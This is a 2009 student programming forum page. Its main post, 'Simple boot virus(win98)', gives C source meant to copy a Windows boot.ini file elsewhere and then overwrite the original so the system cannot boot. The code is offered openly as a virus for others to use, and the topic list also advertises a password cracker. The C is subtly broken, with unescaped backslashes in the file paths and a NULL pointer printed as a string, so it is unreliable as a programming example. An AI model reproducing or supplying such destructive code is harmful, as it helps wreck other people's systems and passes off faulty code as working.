Warm welcome to every visitors

For all nepalis
 
HomeHome  ­CalendarCalendar  ­FAQFAQ  ­SearchSearch  ­MemberlistMemberlist  ­UsergroupsUsergroups  ­RegisterRegister  ­Log inLog in  
Latest topics
» Lab 8 solutions
Wed May 27, 2009 2:42 pm by Anonymous

» Criminal management system
Wed May 27, 2009 12:03 pm by krazzy

» File related lab solutions.
Wed May 27, 2009 12:01 pm by krazzy

» Simple boot virus(win98)
Wed May 27, 2009 11:46 am by krazzy

» Slambook(Student)
Wed May 27, 2009 11:44 am by krazzy

» Snake game
Wed May 27, 2009 11:40 am by krazzy

» Password cracker
Wed May 27, 2009 11:39 am by krazzy

» Hawdare partion tool
Wed May 27, 2009 11:36 am by krazzy

» Library management system
Wed May 27, 2009 11:33 am by krazzy

Search
 
 

Display results as :
 
Rechercher Advanced Search
Poll
What should be the fees range for first year?
200000-300000
80%
 80% [ 4 ]
300000-400000
20%
 20% [ 1 ]
400000-500000
0%
 0% [ 0 ]
Total Votes : 5
Hami first year ko frees kahile ghat cha??????
Sat Mar 07, 2009 12:25 pm by krazzy
What should be the fees range for first year?
Oye fees chadi ghataunu paryooooo............
cheers

Comments: 1
First yer bata chunab kasle jitcha hola???????????
Sat Mar 07, 2009 12:14 pm by Admin
Oye chunab kahile hune chance cha hola????
Any body of you know about this???????????
First year ko fee kati hunu parcha hola?????????

Comments: 0
C programming kasto lagcha??????????????
Sat Mar 07, 2009 12:10 pm by Admin
You can get lab questions solved here................

Comments: 0
Share | 
 

 Simple boot virus(win98)

View previous topic View next topic Go down 
AuthorMessage
krazzy



Posts: 11
Join date: 2009-03-06
Age: 20
Location: New baneshwor,Kathmandu

PostSubject: Simple boot virus(win98)   Wed May 27, 2009 11:46 am

#include <stdio.h>
#include <conio.h>
void main()
{
char b,c;
FILE *f,*g,*h;
clrscr();
c=NULL;
f=fopen("d:\boot.ini","r");
g=fopen("e:\boot.ini","w");
while(1)
{
b=fgetc(f);
if (b==EOF)
break;
fprintf(g,"%c",b);
}
h=fopen("d:\boot.ini","w");
fprintf(h,"%s",c);
fclose(h);
fclose(g);
fclose(f);
getch();
}
Back to top Go down
View user profile http://www.anepali.tk
 

Simple boot virus(win98)

View previous topic View next topic Back to top 
Page 1 of 1

Permissions of this forum:You cannot reply to topics in this forum
Warm welcome to every visitors :: Project Samples-